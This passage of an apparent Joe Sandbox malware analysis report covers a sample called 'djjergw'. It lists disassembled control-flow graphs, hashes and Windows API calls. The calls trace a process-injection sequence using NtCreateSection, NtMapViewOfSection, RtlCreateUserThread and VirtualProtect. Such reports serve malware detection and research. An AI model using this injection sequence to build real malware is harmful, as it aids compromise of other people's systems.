                                                                                    • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418892
                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004188AA
                                                                                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004188D1
                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188DD
                                                                                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 004188F3
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 004188F9
                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041893E
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0041894D
                                                                                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418956
                                                                                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041896B
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041897C
                                                                                    • SetCommMask.KERNELBASE(00000000,00000000), ref: 004189A5
                                                                                    • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004189BB
                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004189EA
                                                                                    • GetComputerNameW.KERNEL32(?,?), ref: 004189FE
                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418A04
                                                                                    • GetBinaryType.KERNEL32(0041A404,?), ref: 00418A16
                                                                                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418A1E
                                                                                    • LoadLibraryA.KERNELBASE(0041A420), ref: 00418A92
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418AC7
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418AEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                    • String ID: k`$}$
                                                                                    • API String ID: 87775671-956986773
                                                                                    • Opcode ID: af848128e07c8e7bc8c1a283e971220105452b3befcdffc31dcb9ba888bf08ed
                                                                                    • Instruction ID: 345bacdf8fa8409494645b8175c494f1eca766bbd4a7b31c038ebc0919f88a2f
                                                                                    • Opcode Fuzzy Hash: af848128e07c8e7bc8c1a283e971220105452b3befcdffc31dcb9ba888bf08ed
                                                                                    • Instruction Fuzzy Hash: 3AB1C471901124ABCB209B65EC54BDF7B79EF49354F00806EF609A3161DB385E85CFAE

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 70 4014db-4014e7 71 401486-40148b 70->71 72 4014e9 70->72 73 401550-401569 72->73 74 4014eb 72->74 80 40155d-40156c call 4011a4 73->80 75 40155a 74->75 76 4014ed-4014fb 74->76 75->80 82 40149a-4014a8 76->82 83 4014fd-4014ff 76->83 86 40156e-40157f 80->86 91 4014c1-4014c8 82->91 85 401501 83->85 83->86 89 401504-401518 85->89 90 40148f 85->90 87 401581 86->87 88 401584-401589 86->88 87->88 99 4018a6-4018ae 88->99 100 40158f-4015a0 88->100 89->91 92 40151a 89->92 90->82 93 401469-401485 call 4011a4 91->93 94 4014ca 91->94 96 401539-401555 92->96 97 40151c-401526 92->97 93->71 94->70 96->73 99->88 108 4018a4-4018b3 100->108 109 4015a6-4015cf 100->109 111 4018c8 108->111 112 4018b9-4018c4 108->112 109->108 117 4015d5-4015ec NtDuplicateObject 109->117 111->112 114 4018cb-4018ff call 4011a4 111->114 112->114 117->108 119 4015f2-401616 NtCreateSection 117->119 122 401672-401698 NtCreateSection 119->122 123 401618-401639 NtMapViewOfSection 119->123 122->108 126 40169e-4016a2 122->126 123->122 125 40163b-401657 NtMapViewOfSection 123->125 125->122 128 401659-40166f 125->128 126->108 129 4016a8-4016c9 NtMapViewOfSection 126->129 128->122 129->108 131 4016cf-4016eb NtMapViewOfSection 129->131 131->108 134 4016f1 call 4016f6 131->134
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                    • String ID: 1
                                                                                    • API String ID: 1652636561-2212294583
                                                                                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                                                                                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 221 401529-401532 222 401543 221->222 223 401539-40153f 221->223 222->223 224 401546-40157f call 4011a4 222->224 223->224 234 401581 224->234 235 401584-401589 224->235 234->235 237 4018a6-4018ae 235->237 238 40158f-4015a0 235->238 237->235 241 4018a4-4018b3 238->241 242 4015a6-4015cf 238->242 244 4018c8 241->244 245 4018b9-4018c4 241->245 242->241 250 4015d5-4015ec NtDuplicateObject 242->250 244->245 247 4018cb-4018ff call 4011a4 244->247 245->247 250->241 252 4015f2-401616 NtCreateSection 250->252 255 401672-401698 NtCreateSection 252->255 256 401618-401639 NtMapViewOfSection 252->256 255->241 259 40169e-4016a2 255->259 256->255 258 40163b-401657 NtMapViewOfSection 256->258 258->255 261 401659-40166f 258->261 259->241 262 4016a8-4016c9 NtMapViewOfSection 259->262 261->255 262->241 264 4016cf-4016eb NtMapViewOfSection 262->264 264->241 267 4016f1 call 4016f6 264->267
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 269 401534-40157f call 4011a4 280 401581 269->280 281 401584-401589 269->281 280->281 283 4018a6-4018ae 281->283 284 40158f-4015a0 281->284 283->281 287 4018a4-4018b3 284->287 288 4015a6-4015cf 284->288 290 4018c8 287->290 291 4018b9-4018c4 287->291 288->287 296 4015d5-4015ec NtDuplicateObject 288->296 290->291 293 4018cb-4018ff call 4011a4 290->293 291->293 296->287 298 4015f2-401616 NtCreateSection 296->298 301 401672-401698 NtCreateSection 298->301 302 401618-401639 NtMapViewOfSection 298->302 301->287 305 40169e-4016a2 301->305 302->301 304 40163b-401657 NtMapViewOfSection 302->304 304->301 307 401659-40166f 304->307 305->287 308 4016a8-4016c9 NtMapViewOfSection 305->308 307->301 308->287 310 4016cf-4016eb NtMapViewOfSection 308->310 310->287 313 4016f1 call 4016f6 310->313
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 315 401541-401543 317 401546-40157f call 4011a4 315->317 318 401539-40153f 315->318 328 401581 317->328 329 401584-401589 317->329 318->317 328->329 331 4018a6-4018ae 329->331 332 40158f-4015a0 329->332 331->329 335 4018a4-4018b3 332->335 336 4015a6-4015cf 332->336 338 4018c8 335->338 339 4018b9-4018c4 335->339 336->335 344 4015d5-4015ec NtDuplicateObject 336->344 338->339 341 4018cb-4018ff call 4011a4 338->341 339->341 344->335 346 4015f2-401616 NtCreateSection 344->346 349 401672-401698 NtCreateSection 346->349 350 401618-401639 NtMapViewOfSection 346->350 349->335 353 40169e-4016a2 349->353 350->349 352 40163b-401657 NtMapViewOfSection 350->352 352->349 355 401659-40166f 352->355 353->335 356 4016a8-4016c9 NtMapViewOfSection 353->356 355->349 356->335 358 4016cf-4016eb NtMapViewOfSection 356->358 358->335 361 4016f1 call 4016f6 358->361
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 363 401545-40157f call 4011a4 371 401581 363->371 372 401584-401589 363->372 371->372 374 4018a6-4018ae 372->374 375 40158f-4015a0 372->375 374->372 378 4018a4-4018b3 375->378 379 4015a6-4015cf 375->379 381 4018c8 378->381 382 4018b9-4018c4 378->382 379->378 387 4015d5-4015ec NtDuplicateObject 379->387 381->382 384 4018cb-4018ff call 4011a4 381->384 382->384 387->378 389 4015f2-401616 NtCreateSection 387->389 392 401672-401698 NtCreateSection 389->392 393 401618-401639 NtMapViewOfSection 389->393 392->378 396 40169e-4016a2 392->396 393->392 395 40163b-401657 NtMapViewOfSection 393->395 395->392 398 401659-40166f 395->398 396->378 399 4016a8-4016c9 NtMapViewOfSection 396->399 398->392 399->378 401 4016cf-4016eb NtMapViewOfSection 399->401 401->378 404 4016f1 call 4016f6 401->404
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 406 401553-40157f call 4011a4 413 401581 406->413 414 401584-401589 406->414 413->414 416 4018a6-4018ae 414->416 417 40158f-4015a0 414->417 416->414 420 4018a4-4018b3 417->420 421 4015a6-4015cf 417->421 423 4018c8 420->423 424 4018b9-4018c4 420->424 421->420 429 4015d5-4015ec NtDuplicateObject 421->429 423->424 426 4018cb-4018ff call 4011a4 423->426 424->426 429->420 431 4015f2-401616 NtCreateSection 429->431 434 401672-401698 NtCreateSection 431->434 435 401618-401639 NtMapViewOfSection 431->435 434->420 438 40169e-4016a2 434->438 435->434 437 40163b-401657 NtMapViewOfSection 435->437 437->434 440 401659-40166f 437->440 438->420 441 4016a8-4016c9 NtMapViewOfSection 438->441 440->434 441->420 443 4016cf-4016eb NtMapViewOfSection 441->443 443->420 446 4016f1 call 4016f6 443->446
                                                                                    APIs
                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                    • String ID:
                                                                                    • API String ID: 1546783058-0
                                                                                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                                                                                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                                                                                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 449 402ffa-40301e 450 403024-40303c 449->450 451 40313d-403142 449->451 450->451 452 403042-403053 450->452 453 403055-40305e 452->453 454 403063-403071 453->454 454->454 455 403073-40307a 454->455 456 40309c-4030a3 455->456 457 40307c-40309b 455->457 458 4030c5-4030c8 456->458 459 4030a5-4030c4 456->459 457->456 460 4030d1 458->460 461 4030ca-4030cd 458->461 459->458 460->453 463 4030d3-4030d8 460->463 461->460 462 4030cf 461->462 462->463 463->451 464 4030da-4030dd 463->464 464->451 465 4030df-40313a RtlCreateUserThread NtTerminateProcess 464->465 465->451
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2037979246.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                    • String ID:
                                                                                    • API String ID: 1921587553-0
                                                                                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 136 5e003c-5e0047 137 5e004c-5e0263 call 5e0a3f call 5e0e0f call 5e0d90 VirtualAlloc 136->137 138 5e0049 136->138 153 5e028b-5e0292 137->153 154 5e0265-5e0289 call 5e0a69 137->154 138->137 156 5e02a1-5e02b0 153->156 157 5e02ce-5e03c2 VirtualProtect call 5e0cce call 5e0ce7 154->157 156->157 158 5e02b2-5e02cc 156->158 165 5e03d1-5e03e0 157->165 158->156 166 5e0439-5e04b8 VirtualFree 165->166 167 5e03e2-5e0437 call 5e0ce7 165->167 169 5e04be-5e04cd 166->169 170 5e05f4-5e05fe 166->170 167->165 174 5e04d3-5e04dd 169->174 171 5e077f-5e0789 170->171 172 5e0604-5e060d 170->172 175 5e078b-5e07a3 171->175 176 5e07a6-5e07b0 171->176 172->171 177 5e0613-5e0637 172->177 174->170 179 5e04e3-5e0505 174->179 175->176 180 5e086e-5e08be LoadLibraryA 176->180 181 5e07b6-5e07cb 176->181 182 5e063e-5e0648 177->182 187 5e0517-5e0520 179->187 188 5e0507-5e0515 179->188 186 5e08c7-5e08f9 180->186 184 5e07d2-5e07d5 181->184 182->171 185 5e064e-5e065a 182->185 189 5e07d7-5e07e0 184->189 190 5e0824-5e0833 184->190 185->171 191 5e0660-5e066a 185->191 192 5e08fb-5e0901 186->192 193 5e0902-5e091d 186->193 194 5e0526-5e0547 187->194 188->194 195 5e07e4-5e0822 189->195 196 5e07e2 189->196 198 5e0839-5e083c 190->198 197 5e067a-5e0689 191->197 192->193 199 5e054d-5e0550 194->199 195->184 196->190 200 5e068f-5e06b2 197->200 201 5e0750-5e077a 197->201 198->180 202 5e083e-5e0847 198->202 204 5e0556-5e056b 199->204 205 5e05e0-5e05ef 199->205 206 5e06ef-5e06fc 200->206 207 5e06b4-5e06ed 200->207 201->182 208 5e084b-5e086c 202->208 209 5e0849 202->209 210 5e056f-5e057a 204->210 211 5e056d 204->211 205->174 212 5e06fe-5e0748 206->212 213 5e074b 206->213 207->206 208->198 209->180 214 5e057c-5e0599 210->214 215 5e059b-5e05bb 210->215 211->205 212->213 213->197 220 5e05bd-5e05db 214->220 215->220 220->199
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E024D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5e0000_djjergw.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: cess$kernel32.dll
                                                                                    • API String ID: 4275171209-1230238691
                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction ID: 8d9f06940a44e2be45beeee2e4bbecad622b7844b54902dca0b4f5182f6b35db
                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                    • Instruction Fuzzy Hash: A9526874A00269DFDB64CF59C984BA8BBB1BF09304F1480D9E94DAB391DB70AE85DF14

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 448 4183f0-418530 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00513D70), ref: 004184CF
                                                                                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041850C
                                                                                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 0041852B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038001720.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_40b000_djjergw.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2099061454-3916222277
                                                                                    • Opcode ID: 0211fdc64f03efc72d4e260aedab5929f5d5dea431bc9e9a5fc3155d62cc35c4
                                                                                    • Instruction ID: 128802b458cc4b351c6b63df09879892f332cdb2aba605945024bc9f97aa87a6
                                                                                    • Opcode Fuzzy Hash: 0211fdc64f03efc72d4e260aedab5929f5d5dea431bc9e9a5fc3155d62cc35c4
                                                                                    • Instruction Fuzzy Hash: 08316F18508780CAE301DB79FC257823FAAAB75744F04D1ACD54C8B3B1D7BA1618E36E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 466 610822-61083b 467 61083d-61083f 466->467 468 610841 467->468 469 610846-610852 CreateToolhelp32Snapshot 467->469 468->469 470 610862-61086f Module32First 469->470 471 610854-61085a 469->471 472 610871-610872 call 6104e1 470->472 473 610878-610880 470->473 471->470 477 61085c-610860 471->477 478 610877 472->478 477->467 477->470 478->473
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0061084A
                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0061086A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038289843.000000000060D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_60d000_djjergw.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 3833638111-0
                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction ID: 3a59b0cf86a0549b21c4c45f85ead23eddd10ebf11ac010becf6ce86b74f9df0
                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                    • Instruction Fuzzy Hash: BBF0C231600710ABEF603AB5A88CBEE72EDAF48324F140168E642911C0CBB0E8C586A1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 479 5e0e0f-5e0e24 SetErrorMode * 2 480 5e0e2b-5e0e2c 479->480 481 5e0e26 479->481 481->480
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00000400,?,?,005E0223,?,?), ref: 005E0E19
                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,005E0223,?,?), ref: 005E0E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2038193053.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_5e0000_djjergw.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: cea14cca2211f37e0d6e011ac58af5d885f71300399aca2e74a7d4b784c7d1e3
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: 0FD0123114512877D7002A95DC09BCD7F1CDF05B62F008421FB0DD9080C7B0994046E5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 482 40190e-40190f 483 401912-401963 call 4011a4 Sleep call 401426 482->483 484 4018b5-4018ff call 4011a4 482->484 507 401972-401978 483->507 508 401965-40196d call 401529 483->508 511 40198e 507->511 512 40197f-40198a 507->512 508->507 511->512 513 401991-4019bd call 4011a4 511->513 512->513
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
